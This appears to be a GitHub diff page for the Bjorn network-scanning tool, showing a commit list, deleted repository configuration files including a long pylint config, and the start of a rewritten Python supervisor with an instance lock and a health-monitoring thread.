10 Commits
v1.0.0...ai

Author SHA1 Message Date
infinition
aac77a3e76 Add Loki and Sentinel utility classes for web API endpoints
- Implemented LokiUtils class with GET and POST endpoints for managing scripts, jobs, and payloads.
- Added SentinelUtils class with GET and POST endpoints for managing events, rules, devices, and notifications.
- Both classes include error handling and JSON response formatting.
2026-03-14 22:33:10 +01:00
Fabien POLLY
eb20b168a6 Add RLUtils class for managing RL/AI dashboard endpoints
- Implemented methods for fetching AI stats, training history, and recent experiences.
- Added functionality to set operation mode (MANUAL, AUTO, AI) with appropriate handling.
- Included helper methods for querying the database and sending JSON responses.
- Integrated model metadata extraction for visualization purposes.
2026-02-18 22:36:10 +01:00
Fabien POLLY
b8a13cc698 wiki test 2026-01-24 18:06:18 +01:00
Fabien POLLY
a78d05a87d Readme modified with Architecture link 2025-12-10 16:44:36 +01:00
Fabien POLLY
dec45ab608 docs: Add initial architecture documentation for Bjorn Cyberviking. 2025-12-10 16:40:52 +01:00
Fabien POLLY
d3b0b02a0b feat: Added ARCHITECTURE.md file 2025-12-10 16:39:59 +01:00
Fabien POLLY
c1729756c0 BREAKING CHANGE: Complete refactor of architecture to prepare BJORN V2 release, APIs, assets, and UI, webapp, logics, attacks, a lot of new features... 2025-12-10 16:01:03 +01:00
Fabien POLLY
a748f523a9 chore: Add 'test' to comment line. 2025-12-02 17:35:34 +01:00
infinition
aa3d6712c6 Merge pull request #137 from infinition/main 2025-09-15 22:32:27 +02:00
infinition
5c4882a515 Merge pull request #52 from infinition/main
Sync the updates for the DEV branch in order to prepare a release on the main
2024-11-21 10:06:03 +01:00
1053 changed files with 155351 additions and 12167 deletions

2
.gitattributes vendored

@@ -1,2 +0,0 @@
*.sh text eol=lf
*.py text eol=lf

15
.github/FUNDING.yml vendored

@@ -1,15 +0,0 @@
# These are supported funding model platforms
#github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
#patreon: # Replace with a single Patreon username
#open_collective: # Replace with a single Open Collective username
#ko_fi: # Replace with a single Ko-fi username
#tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
#community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
#liberapay: # Replace with a single Liberapay username
#issuehunt: # Replace with a single IssueHunt username
#lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
#polar: # Replace with a single Polar username
buy_me_a_coffee: infinition
#thanks_dev: # Replace with a single thanks.dev username
#custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']


@@ -1,34 +0,0 @@
---
name: Bug report
about: Create a report to help us improve
title: ""
labels: ""
assignees: ""
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Hardware (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.


@@ -1,11 +0,0 @@
---
# .github/ISSUE_TEMPLATE/config.yml
blank_issues_enabled: false
contact_links:
- name: Bjorn Community Support
url: https://github.com/infinition/bjorn/discussions
about: Please ask and answer questions here.
- name: Bjorn Security Reports
url: https://infinition.github.io/bjorn/SECURITY
about: Please report security vulnerabilities here.


@@ -1,19 +0,0 @@
---
name: Feature request
about: Suggest an idea for this project
title: ""
labels: ""
assignees: ""
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.


@@ -1,12 +0,0 @@
# .github/dependabot.yml
version: 2
updates:
- package-ecosystem: "pip"
directory: "."
schedule:
interval: "weekly"
commit-message:
prefix: "fix(deps)"
open-pull-requests-limit: 5
target-branch: "dev"

137
.gitignore vendored

@@ -1,137 +0,0 @@
# Node.js / npm
node_modules/
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.pnpm-debug.log*
package-lock.json*
# TypeScript / TSX
dist/
*.tsbuildinfo
# Poetry
poetry.lock
# Environment variables
.env
.env.*.local
# Logs
logs
*.log
pnpm-debug.log*
lerna-debug.log*
# Dependency directories
jspm_packages/
# Optional npm cache directory
.npm
# Output of 'npm pack'
*.tgz
# Lockfiles
yarn.lock
.pnpm-lock.yaml
# Optional eslint cache
.eslintcache
# Optional stylelint cache
.stylelintcache
# Optional REPL history
.node_repl_history
# Coverage directory used by tools like istanbul/jest
istanbul/
jest/
coverage/
# Output of 'tsc' command
out/
build/
tmp/
temp/
# Python
__pycache__/
*.py[cod]
*.so
*.egg
*.egg-info/
pip-wheel-metadata/
*.pyo
*.pyd
*.whl
*.pytest_cache/
.tox/
env/
venv
venv/
ENV/
env.bak/
.venv/
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# Coverage reports
htmlcov/
.coverage
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
# Jupyter Notebook
.ipynb_checkpoints
# Django stuff:
staticfiles/
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# VS Code settings
.vscode/
.idea/
# macOS files
.DS_Store
.AppleDouble
.LSOverride
# Windows files
Thumbs.db
ehthumbs.db
Desktop.ini
$RECYCLE.BIN/
# Linux system files
*.swp
*~
# IDE specific
*.iml
*.suo
*.ntvs*
*.njsproj
*.sln
*.sw?
scripts
*/certs/

652
.pylintrc

@@ -1,652 +0,0 @@
[MAIN]
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Clear in-memory caches upon conclusion of linting. Useful if running pylint
# in a server-like mode.
clear-cache-post-run=no
# Load and enable all available extensions. Use --list-extensions to see a list
# of all available extensions.
#enable-all-extensions=
# In error mode, messages with a category besides ERROR or FATAL are
# suppressed, and no reports are done by default. Error mode is compatible with
# disabling specific errors.
#errors-only=
# Always return a 0 (non-error) status code, even if lint errors are found.
# This is primarily useful in continuous integration scripts.
#exit-zero=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loaded into the active Python interpreter and may
# run arbitrary code.
extension-pkg-allow-list=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loaded into the active Python interpreter and may
# run arbitrary code. (This is an alternative name to extension-pkg-allow-list
# for backward compatibility.)
extension-pkg-whitelist=
# Return non-zero exit code if any of these messages/categories are detected,
# even if score is above --fail-under value. Syntax same as enable. Messages
# specified are enabled, while categories only check already-enabled messages.
fail-on=
# Specify a score threshold under which the program will exit with error.
fail-under=8
# Interpret the stdin as a python script, whose filename needs to be passed as
# the module_or_package argument.
#from-stdin=
# Files or directories to be skipped. They should be base names, not paths.
ignore=venv,node_modules,scripts
# Add files or directories matching the regular expressions patterns to the
# ignore-list. The regex matches against paths and can be in Posix or Windows
# format. Because '\\' represents the directory delimiter on Windows systems,
# it can't be used as an escape character.
ignore-paths=
# Files or directories matching the regular expression patterns are skipped.
# The regex matches against base names, not paths. The default value ignores
# Emacs file locks
ignore-patterns=^\.#
# List of module names for which member attributes should not be checked and
# will not be imported (useful for modules/projects where namespaces are
# manipulated during runtime and thus existing member attributes cannot be
# deduced by static analysis). It supports qualified module names, as well as
# Unix pattern matching.
ignored-modules=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use, and will cap the count on Windows to
# avoid hangs.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Resolve imports to .pyi stubs if available. May reduce no-member messages and
# increase not-an-iterable messages.
prefer-stubs=no
# Minimum Python version to use for version dependent checks. Will default to
# the version used to run pylint.
py-version=3.12
# Discover python modules and packages in the file system subtree.
recursive=no
# Add paths to the list of the source roots. Supports globbing patterns. The
# source root is an absolute path or a path relative to the current working
# directory used to determine a package namespace for modules located under the
# source root.
source-roots=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
# In verbose mode, extra non-checker-related info will be displayed.
#verbose=
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style. If left empty, argument names will be checked with the set
# naming style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style. If left empty, attribute names will be checked with the set naming
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Bad variable names regexes, separated by a comma. If names match any regex,
# they will always be refused
bad-names-rgxs=
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style. If left empty, class attribute names will be checked
# with the set naming style.
#class-attribute-rgx=
# Naming style matching correct class constant names.
class-const-naming-style=UPPER_CASE
# Regular expression matching correct class constant names. Overrides class-
# const-naming-style. If left empty, class constant names will be checked with
# the set naming style.
#class-const-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style. If left empty, class names will be checked with the set naming style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style. If left empty, constant names will be checked with the set naming
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style. If left empty, function names will be checked with the set
# naming style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Good variable names regexes, separated by a comma. If names match any regex,
# they will always be accepted
good-names-rgxs=
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style. If left empty, inline iteration names will be checked
# with the set naming style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style. If left empty, method names will be checked with the set naming style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style. If left empty, module names will be checked with the set naming style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Regular expression matching correct type alias names. If left empty, type
# alias names will be checked with the set naming style.
#typealias-rgx=
# Regular expression matching correct type variable names. If left empty, type
# variable names will be checked with the set naming style.
#typevar-rgx=
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style. If left empty, variable names will be checked with the set
# naming style.
variable-rgx=[a-z_][a-z0-9_]{2,30}$
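The variable-rgx above accepts snake_case names of 3 to 31 characters. A quick sketch (helper name hypothetical) to check candidate names against the same pattern; note that entries in good-names, such as i and j, bypass this check entirely:

```python
import re

# Same pattern as variable-rgx above; pylint anchors it at the start of the name.
VARIABLE_RGX = re.compile(r"[a-z_][a-z0-9_]{2,30}$")

def is_valid_variable_name(name: str) -> bool:
    """Return True if the variable-rgx pattern would accept this name."""
    return VARIABLE_RGX.match(name) is not None

print(is_valid_variable_name("scan_results"))  # True
print(is_valid_variable_name("x"))             # False: shorter than 3 characters
print(is_valid_variable_name("ScanResults"))   # False: not snake_case
```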
[CLASSES]
# Warn about protected attribute access inside special methods
check-protected-access-in-special-methods=no
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
asyncSetUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,_fields,_replace,_source,_make,os._exit
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=mcs
[DESIGN]
# List of regular expressions of class ancestor names to ignore when counting
# public methods (see R0903)
exclude-too-few-public-methods=
# List of qualified class names to ignore when counting class parents (see
# R0901)
ignored-parents=
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of positional arguments for function / method.
max-positional-arguments=5
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when caught.
overgeneral-exceptions=builtins.BaseException,builtins.Exception
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=100
# Maximum number of lines in a module.
max-module-lines=2500
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow explicit reexports by alias from a package __init__.
allow-reexport-from-package=no
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=
# Output a graph (.gv or any supported image format) of external dependencies
# to the given file (report RP0402 must not be disabled).
ext-import-graph=
# Output a graph (.gv or any supported image format) of all (i.e. internal and
# external) dependencies to the given file (report RP0402 must not be
# disabled).
import-graph=
# Output a graph (.gv or any supported image format) of internal dependencies
# to the given file (report RP0402 must not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[LOGGING]
# The type of string formatting that logging methods do. `old` means using %
# formatting, `new` is for `{}` formatting.
logging-format-style=new
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, CONTROL_FLOW, INFERENCE, INFERENCE_FAILURE,
# UNDEFINED.
confidence=HIGH,
CONTROL_FLOW,
INFERENCE,
INFERENCE_FAILURE,
UNDEFINED
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then re-enable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=missing-module-docstring,
invalid-name,
too-few-public-methods,
E1101,
C0115,
duplicate-code,
raise-missing-from,
wrong-import-order,
ungrouped-imports,
reimported,
too-many-locals,
missing-timeout,
broad-exception-caught,
broad-exception-raised,
line-too-long
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifiers separated by comma (,) or put this option
# multiple times (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
#enable=
[METHOD_ARGS]
# List of qualified names (i.e., library.method) which require a timeout
# parameter e.g. 'requests.api.get,requests.api.post'
timeout-methods=requests.api.delete,requests.api.get,requests.api.head,requests.api.options,requests.api.patch,requests.api.post,requests.api.put,requests.api.request
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
# Regular expression of note tags to take in consideration.
notes-rgx=
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit,argparse.parse_error
# Let 'consider-using-join' be raised when the separator to join on would be
# non-empty (resulting in expected fixes of the type: ``"- " + " -
# ".join(items)``)
suggest-join-with-non-empty-separator=yes
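The "expected fixes" mentioned in the comment above look like this in practice: consider-using-join flags string accumulation in a loop and suggests a single join with the non-empty separator (a minimal illustration, not project code):

```python
items = ["alpha", "beta", "gamma"]

# The pattern pylint flags: repeated concatenation inside a loop.
accumulated = ""
for item in items:
    accumulated += "- " + item + " "

# The suggested rewrite: one join with a non-empty separator.
result = "- " + " - ".join(items)
print(result)  # - alpha - beta - gamma
```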
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'fatal', 'error', 'warning', 'refactor',
# 'convention', and 'info' which contain the number of messages in each
# category, as well as 'statement' which is the total number of statements
# analyzed. This score is used by the global evaluation report (RP0004).
evaluation=max(0, 0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10))
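The evaluation expression above can be mirrored as a plain function to see how message counts translate into the 0-10 score that fail-under=8 is compared against (a sketch assuming statement > 0; any fatal message forces the score to 0):

```python
def pylint_score(fatal, error, warning, refactor, convention, statement):
    """Mirror of the evaluation expression in this config (assumes statement > 0)."""
    if fatal:
        return 0.0
    # Errors are weighted five times heavier than other message categories.
    penalty = (5 * error + warning + refactor + convention) / statement * 10
    return max(0.0, 10.0 - penalty)

# Two warnings and one convention message across 100 statements:
print(pylint_score(0, 0, 2, 0, 1, 100))  # 9.7, above the fail-under=8 threshold
```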
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
msg-template=
# Set the output format. Available formats are: text, parseable, colorized,
# json2 (improved json format), json (old json format) and msvs (visual
# studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
#output-format=
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[SIMILARITIES]
# Comments are removed from the similarity computation
ignore-comments=yes
# Docstrings are removed from the similarity computation
ignore-docstrings=yes
# Imports are removed from the similarity computation
ignore-imports=yes
# Signatures are removed from the similarity computation
ignore-signatures=yes
# Minimum lines number of a similarity.
min-similarity-lines=4
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. No available dictionaries: you need to install
# both the python package and the system dependency for enchant to work.
spelling-dict=
# List of comma separated words that should be considered directives if they
# appear at the beginning of a comment and should not be checked.
spelling-ignore-comment-directives=fmt: on,fmt: off,noqa:,noqa,nosec,isort:skip,mypy:
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[STRING]
# This flag controls whether inconsistent-quotes generates a warning when the
# character used as a quote delimiter is used inconsistently within a module.
check-quote-consistency=no
# This flag controls whether the implicit-str-concat should generate a warning
# on implicit string concatenation in sequences defined over several lines.
check-str-concat-over-line-jumps=no
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of symbolic message names to ignore for Mixin members.
ignored-checks-for-mixins=no-member,
not-async-context-manager,
not-context-manager,
attribute-defined-outside-init
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local,argparse.Namespace
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# Regex pattern to define which classes are considered mixins.
mixin-class-rgx=.*[Mm]ixin
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of names allowed to shadow builtins
allowed-redefined-builtins=
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
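The dummy-variables-rgx above decides which assigned-but-unused names are exempt from unused-variable warnings. A quick check against the same pattern (helper name hypothetical); pylint matches from the start of the name, so the unanchored branches only need to match a prefix:

```python
import re

# Same pattern as dummy-variables-rgx above.
DUMMY_RGX = re.compile(r"_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_")

def is_dummy(name: str) -> bool:
    """Return True if pylint would treat this name as an intentional dummy."""
    return DUMMY_RGX.match(name) is not None

print(is_dummy("_"))            # True: bare underscore(s)
print(is_dummy("_leftover"))    # True: leading-underscore name
print(is_dummy("unused_rows"))  # True: unused_ prefix
print(is_dummy("rows"))         # False: would still trigger unused-variable
```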
# Argument names that match this expression will be ignored.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io

744
Bjorn.py

@@ -1,158 +1,694 @@
# Bjorn.py
# This script defines the main execution flow for the Bjorn application. It initializes and starts
# various components such as network scanning, display, and web server functionalities. The Bjorn
# class manages the primary operations, including initiating network scans and orchestrating tasks.
# The script handles startup delays, checks for Wi-Fi connectivity, and coordinates the execution of
# scanning and orchestrator tasks using semaphores to limit concurrent threads. It also sets up
# signal handlers to ensure a clean exit when the application is terminated.
# Main entry point and supervisor for the Bjorn project.
# Manages the lifecycle of threads, health monitoring, and crash protection.
# Optimized for the Pi Zero 2: low CPU overhead, aggressive RAM management.
# Functions:
# - handle_exit: handles the termination of the main and display threads.
# - handle_exit_webserver: handles the termination of the web server thread.
# - is_wifi_connected: checks for Wi-Fi connectivity using the nmcli command.
# The script starts by loading shared data configurations, then initializes and starts
# the components described above.
import atexit
import gc
import logging
import os
import signal
import subprocess
import sys
import threading
import time
import tracemalloc
from comment import Commentaireia
from display import Display, handle_exit_display
from init_shared import shared_data
from logger import Logger
from orchestrator import Orchestrator
from runtime_state_updater import RuntimeStateUpdater
from webapp import web_thread, handle_exit_web
logger = Logger(name="Bjorn.py", level=logging.DEBUG)
_shutdown_lock = threading.Lock()
_shutdown_started = False
_instance_lock_fd = None
_instance_lock_path = "/tmp/bjorn_160226.lock"
try:
import fcntl
except Exception:
fcntl = None
def _release_instance_lock():
global _instance_lock_fd
if _instance_lock_fd is None:
return
try:
if fcntl is not None:
try:
fcntl.flock(_instance_lock_fd.fileno(), fcntl.LOCK_UN)
except Exception:
pass
_instance_lock_fd.close()
except Exception:
pass
_instance_lock_fd = None
def _acquire_instance_lock() -> bool:
"""Ensure only one Bjorn_160226 process can run at once."""
global _instance_lock_fd
if _instance_lock_fd is not None:
return True
try:
fd = open(_instance_lock_path, "a+", encoding="utf-8")
except Exception as exc:
logger.error(f"Unable to open instance lock file {_instance_lock_path}: {exc}")
return True
if fcntl is None:
_instance_lock_fd = fd
return True
try:
fcntl.flock(fd.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
fd.seek(0)
fd.truncate()
fd.write(str(os.getpid()))
fd.flush()
except OSError:
try:
fd.seek(0)
owner_pid = fd.read().strip() or "unknown"
except Exception:
owner_pid = "unknown"
logger.critical(f"Another Bjorn instance is already running (pid={owner_pid}).")
try:
fd.close()
except Exception:
pass
return False
_instance_lock_fd = fd
return True
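The single-instance guard above relies on flock semantics: on Linux, locks taken through independently opened descriptors of the same file conflict with each other, even within one process. A minimal stand-alone sketch of that behavior (file name hypothetical, not the lock path used by Bjorn):

```python
import fcntl
import os
import tempfile

# Hypothetical demo file, not Bjorn's real lock path.
lock_path = os.path.join(tempfile.gettempdir(), "demo_instance.lock")

first = open(lock_path, "a+")
fcntl.flock(first.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)  # first "instance" wins

second = open(lock_path, "a+")
try:
    # A second non-blocking attempt on an independent descriptor is refused.
    fcntl.flock(second.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
    holds = True
except OSError:  # EWOULDBLOCK: the lock is already held
    holds = False

print(holds)  # False: mirrors the "another instance is already running" path
second.close()
first.close()
```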
class HealthMonitor(threading.Thread):
"""Periodic runtime health logger (threads/fd/rss/queue/epd metrics)."""
def __init__(self, shared_data_, interval_s: int = 60):
super().__init__(daemon=True, name="HealthMonitor")
self.shared_data = shared_data_
self.interval_s = max(10, int(interval_s))
self._stop_event = threading.Event()
self._tm_prev_snapshot = None
self._tm_last_report = 0.0
def stop(self):
self._stop_event.set()
def _fd_count(self) -> int:
try:
return len(os.listdir("/proc/self/fd"))
except Exception:
return -1
def _rss_kb(self) -> int:
try:
with open("/proc/self/status", "r", encoding="utf-8") as fh:
for line in fh:
if line.startswith("VmRSS:"):
parts = line.split()
if len(parts) >= 2:
return int(parts[1])
except Exception:
pass
return -1
def _queue_counts(self):
pending = running = scheduled = -1
try:
# Using query_one safe method from database
row = self.shared_data.db.query_one(
"""
SELECT
SUM(CASE WHEN status='pending' THEN 1 ELSE 0 END) AS pending,
SUM(CASE WHEN status='running' THEN 1 ELSE 0 END) AS running,
SUM(CASE WHEN status='scheduled' THEN 1 ELSE 0 END) AS scheduled
FROM action_queue
"""
)
if row:
pending = int(row.get("pending") or 0)
running = int(row.get("running") or 0)
scheduled = int(row.get("scheduled") or 0)
except Exception as exc:
logger.error_throttled(
f"Health monitor queue count query failed: {exc}",
key="health_queue_counts",
interval_s=120,
)
return pending, running, scheduled
def run(self):
while not self._stop_event.wait(self.interval_s):
try:
threads = threading.enumerate()
thread_count = len(threads)
top_threads = ",".join(t.name for t in threads[:8])
fd_count = self._fd_count()
rss_kb = self._rss_kb()
pending, running, scheduled = self._queue_counts()
# Lock to safely read shared metrics without race conditions
with self.shared_data.health_lock:
display_metrics = dict(getattr(self.shared_data, "display_runtime_metrics", {}) or {})
epd_enabled = int(display_metrics.get("epd_enabled", 0))
epd_failures = int(display_metrics.get("failed_updates", 0))
epd_reinit = int(display_metrics.get("reinit_attempts", 0))
epd_headless = int(display_metrics.get("headless", 0))
epd_last_success = display_metrics.get("last_success_epoch", 0)
                logger.info(
                    "health "
                    f"thread_count={thread_count} "
                    f"top_threads={top_threads} "
                    f"fd_count={fd_count} "
                    f"rss_kb={rss_kb} "
                    f"queue_pending={pending} "
                    f"queue_running={running} "
                    f"queue_scheduled={scheduled} "
                    f"epd_enabled={epd_enabled} "
                    f"epd_failures={epd_failures} "
                    f"epd_reinit={epd_reinit} "
                    f"epd_headless={epd_headless} "
                    f"epd_last_success={epd_last_success}"
                )
# Optional: tracemalloc report (only if enabled via PYTHONTRACEMALLOC or tracemalloc.start()).
try:
if tracemalloc.is_tracing():
now = time.monotonic()
tm_interval = float(self.shared_data.config.get("tracemalloc_report_interval_s", 300) or 300)
if tm_interval > 0 and (now - self._tm_last_report) >= tm_interval:
self._tm_last_report = now
top_n = int(self.shared_data.config.get("tracemalloc_top_n", 10) or 10)
top_n = max(3, min(top_n, 25))
snap = tracemalloc.take_snapshot()
if self._tm_prev_snapshot is not None:
stats = snap.compare_to(self._tm_prev_snapshot, "lineno")[:top_n]
logger.info(f"mem_top (tracemalloc diff, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
else:
stats = snap.statistics("lineno")[:top_n]
logger.info(f"mem_top (tracemalloc, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
self._tm_prev_snapshot = snap
except Exception as exc:
logger.error_throttled(
f"Health monitor tracemalloc failure: {exc}",
key="health_tracemalloc_error",
interval_s=300,
)
except Exception as exc:
logger.error_throttled(
f"Health monitor loop failure: {exc}",
key="health_loop_error",
interval_s=120,
)
class Bjorn:
    """Main class for Bjorn. Manages orchestration lifecycle."""

    def __init__(self, shared_data_):
        self.shared_data = shared_data_
self.commentaire_ia = Commentaireia()
self.orchestrator_thread = None
self.orchestrator = None
self.network_connected = False
self.wifi_connected = False
self.previous_network_connected = None
self._orch_lock = threading.Lock()
self._last_net_check = 0 # Throttling for network scan
